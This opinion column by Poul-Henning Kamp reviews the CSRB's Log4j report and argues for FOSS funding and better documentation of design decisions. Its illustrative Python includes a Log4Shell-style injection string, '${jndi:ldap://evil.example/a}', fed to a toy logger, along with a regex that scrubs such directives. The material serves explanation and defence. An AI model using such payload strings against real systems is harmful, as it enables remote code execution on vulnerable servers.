The Bike Shed


CSRB's Opus One

Comments on the Cyber Safety Review Board Log4j Event Report

Poul-Henning Kamp

The recently formed CSRB (Cyber Safety Review Board), established by President Biden in May 2021 to review significant cyber incidents and provide "advice, information, or recommendations for improving cybersecurity and incident response practices and policy," published its first report in July: Review of the December 2021 Log4j Event.

The Log4j logging utility, an Apache Software Foundation project, has been integrated into millions of systems. "A vulnerability in such a pervasive and ubiquitous piece of software has the ability to impact companies and organizations (including governments) all over the world," according to the CSRB report.

To the best of my knowledge, this new CSRB report is the world's first from a dedicated IT security accident review board, and that deserves our full attention.

Before we start, let's get one thing perfectly clear: The entire and only reason for writing reports like this one is to avoid repeating the same mistake—no more, no less. Assigning guilt, placing blame, exposing incompetence, or getting people fired is not CSRB's job. It investigates; the rest of us act.

Writing, and to a lesser extent reading, accident investigation reports is an art form of its own, so I will let you in on a secret: The big stinker in this one is at the top of page 15.

The Alibaba Cloud Security Team told the Apache Software Foundation about the Log4j vulnerability on November 24, and only on December 13, a full three weeks later, did they tell the Chinese Ministry of Industry and Information Technology about it.

The law of the land, in this case China, mandates that they report to the ministry within two days of discovery and not tell anybody else until and unless the ministry permits it. The ministry could have decided to keep a zero-day vulnerability like Log4j secret, in which case the rest of the world would still not have heard anything about it and Chinese spies would have had their own backdoor into all the vulnerable Log4j instances in the world.

A good political reaction would be for the United States and European Union to designate risking life, limb, or liberty to disclose a zero-day vulnerability of this caliber an explicit cause for political asylum.

With that out of the way...

I don't know enough about the internal workings of the U.S. government to pass judgment on many of the recommendations, and several others are so obvious that there is nothing to add. Except that now they have become official recommendations, which means that ignoring them could be a career-limiting move.

There is one recommendation specifically about FOSS (free and open-source software) on which I want to comment: Recommendation 13 says, "Increase investments in open source software security" and the first bullet is:

• OMB [Office of Management and Budget] should take appropriate steps to direct federal agency IT staff to contribute to the security and maintenance of open source software upon which they rely, as part of their regular duties.

Yes, please! But don't just make this about the federal government. Any organization that uses FOSS is, ipso facto, joining a nonprofit co-op responsible for the future of that software. Most FOSS projects are developer-centric, and the world would be a much better place if they got more involvement from their actual users—in design decisions, in testing, and simply in improving and updating the documentation with actual user experience.

The second bullet is:

• ONCD [Office of the National Cyber Director], in coordination with OMB, should consider effective funding mechanisms to invest in widely used open source software tools, and to catalyze improvements in the overall security of the open source software ecosystem.

That can and will get sticky fast, as anything does when money gets involved. The best way to get a lot of bang for some bucks—with very little friction—is to look to the MacArthur Fellowships (commonly known as the "genius grants") for inspiration. Once per month, pick one young FOSS contributor who shows a lot of promise and offer that person a grant of $10,000 per month for the next five years with no strings attached.

Yes, some of them will fizzle, some of them will party, but most of them will do something worthwhile and valuable to improve FOSS security, and a few of them will do something utterly brilliant, most of which would not happen or get the same traction if they had to make the market pay. It would cost $7.2 million per year, and it would be completely fair for U.S. taxpayers to pay for only the odd-numbered months and ask EU taxpayers to pay for the even-numbered ones. Please name it the "Margaret Hamilton Fellowship," which would be an appropriate and well-deserved honor for this pioneering computer scientist.

Finally, there is one aspect of FOSS that CSRB does not address, which deserves a hard look: design decisions.

The thing is, unlike, for example, the Heartbleed bug, the Log4j vulnerability was not a mistake. It was an explicitly and deliberately added feature that worked precisely the way it was intended to work. Appendix C goes so far as to list some of the research and publications that followed the 2014 release of this Log4j feature—research that raised relevant and concerning questions—and there, appendix C just ends?
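The mechanics of that feature are easy to model. The following toy Python logger is my own sketch, not Log4j's actual code: it expands ${lookup:...} directives wherever they appear in a finished log record—including inside attacker-supplied data—which is precisely the "working as intended" behavior that became the vulnerability. In the real thing, the jndi lookup could fetch and execute remote code; here it merely simulates the side effect.

```python
import re

# Toy model of a logger that expands ${scheme:value} lookups in records.
# The handlers are hypothetical stand-ins; in Log4j, the jndi lookup
# could trigger a remote fetch -- here it just returns a marker string.
LOOKUPS = {
    "env": lambda v: f"<value of environment variable {v}>",
    "jndi": lambda v: f"<REMOTE FETCH FROM {v}!>",  # the dangerous one
}

def expand(record: str) -> str:
    """Expand every ${scheme:value} directive found in a log record."""
    def repl(m):
        scheme, value = m.group(1), m.group(2)
        handler = LOOKUPS.get(scheme)
        return handler(value) if handler else m.group(0)
    return re.sub(r"\$\{(\w+):([^}]*)\}", repl, record)

def log(template: str, user_input: str) -> str:
    # The logger interpolates the user input first, then expands lookups
    # over the WHOLE record -- so directives smuggled in via user_input
    # get expanded too.  That is the design decision, working as designed.
    return expand(template % user_input)

# Benign use: a plain user agent passes through untouched.
print(log("user agent: %s", "Mozilla/5.0"))
# Hostile use: the attacker puts a directive in a header we log verbatim.
print(log("user agent: %s", "${jndi:ldap://evil.example/a}"))
```

Nothing in this sketch is a bug in the classical sense; the injection arises entirely from the decision to run the expansion over data the operator did not write.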

CSRB does not get into the actual design decision or the need for, or lack of, reconsideration of it, in light of the red flags that came later. Getting it right(er) from the start would, of course, have been nice, but I can testify from personal experience that FOSS developers usually have little or no clue where their code will end up or what it will be used for.

Back in 1994, I wrote a stopgap password scrambler for FreeBSD, which trivially and repeatedly applied the MD5 cryptographic hash algorithm to the password and salt in a hardware-unfriendly way. (It was a "stopgap" because export regulations prevented us from distributing the source code for a "real," DES (Data Encryption Standard)-based Unix crypt(3) function.) I did not in any way, shape, or form foresee that in two short years my hastily cobbled-together source code would protect half of the passwords on a vastly larger Internet, including all the administrative passwords on all the routers from Cisco.
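The core trick of that scrambler—iterating a cheap hash many times so that each password guess becomes expensive—can be sketched in a few lines. This is a simplified illustration of the idea only, not FreeBSD's actual md5crypt algorithm, whose mixing schedule is considerably more baroque (and MD5 itself should not be used for new designs today):

```python
import hashlib

def stretched_hash(password: str, salt: str, rounds: int = 1000) -> str:
    # Start from password + salt, then feed the digest back into MD5
    # 'rounds' times.  Each guess now costs ~rounds hash operations,
    # and the sequential chaining is awkward to parallelize in hardware.
    state = hashlib.md5((password + salt).encode()).digest()
    for _ in range(rounds):
        state = hashlib.md5(state + password.encode()).digest()
    return state.hex()

def verify(password: str, salt: str, stored: str) -> bool:
    return stretched_hash(password, salt) == stored

stored = stretched_hash("hunter2", "aB3x")
assert verify("hunter2", "aB3x", stored)
assert not verify("hunter3", "aB3x", stored)
```

The design question the text raises applies here too: nothing in those few lines says how many systems they will end up protecting.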

Equally little did I expect, a decade later, that my Varnish HTTP Cache would come to move a quarter of all web traffic in the world. Or that other bits and pieces of my code would end up in game consoles, cars, dishwashers, satellites, submarines, agricultural subsidy web applications, and who knows where else? Having talked with other authors of successful FOSS, I am comforted to know that I am not alone in this lack of foresight—but that only makes the problem worse.

Expecting FOSS authors to make good, long-term, correct design decisions without knowing the users—without even knowing the order of magnitude of users, and having little or no idea what they will use the software for—not only would be patently unreasonable but also dangerously stupid and stupidly dangerous. We don't lack good, true, and battle-tested general software design principles. Idols such as Frederick P. Brooks and Jim Gettys have produced some good rules we should all heed, but as far as I can tell, none of them contraindicated the addition of this feature to Log4j back in July 2013.

If the addition of the problematic feature was not a wrong design decision, people must subsequently have been uninformed about, overlooked, or not understood the full consequences of that design decision.

That is something we can and should work on.

Somewhere—very prominently—the Log4j documentation should have included a warning against log records containing unwashed input from potentially hostile sources, which, as far as I can tell, it did not. Not even after subsequent research, as listed in appendix C, raised warning flags.
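What such a warning might have told users to do is simple enough. Here is my own hedged sketch of the consumer-side defense—neutralizing lookup-style directives in untrusted data before it ever reaches a lookup-aware logger—not an official Log4j mitigation:

```python
import re

# Strip anything that looks like a ${...} lookup directive from data we
# did not generate ourselves, before handing it to the logger.  A sketch:
# real directives can nest, which this simple pattern does not handle.
DIRECTIVE = re.compile(r"\$\{[^}]*\}")

def scrub(untrusted: str) -> str:
    return DIRECTIVE.sub("<scrubbed>", untrusted)

print(scrub("Mozilla/5.0"))                    # ordinary input, unchanged
print(scrub("${jndi:ldap://evil.example/a}"))  # directive neutralized
```

The point is not this particular regex but the habit: treat log records as an output channel that hostile input can reach, and say so in the documentation.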

We in FOSS need to become much better at documenting design decisions—along with their assumptions and consequences—in a way and a place where the right people (who?) will find it, read it, and understand it, before they do something ill-advised or downright stupid with our code.

And we need periodically to revise that documentation to make sure that the decisions made by "some random person in Nebraska" in the software's infancy are still the right ones, and that people understand their consequences in a changed world.

So, one way or another, "It seemed like a good design decision at the time" will always be a significant and unavoidable risk factor for FOSS security, and, therefore, CSRB will get to it, sooner or later, in one of its undoubtedly numerous future reports.


Poul-Henning Kamp ([email protected]) spent more than a decade as one of the primary developers of the FreeBSD operating system before creating Varnish HTTP Cache software, which around a fifth of all web traffic goes through at some point. He lives in his native Denmark, where he makes a living as an independent contractor, specializing in making computers do weird stuff. One of his most recent projects was a supercomputer cluster to stop the stars twinkling in the mirrors of ESO's (European Southern Observatory's) new ELT (extremely large telescope).

Copyright © 2022 held by owner/author. Publication rights licensed to ACM.


Originally published in Queue vol. 20, no. 4


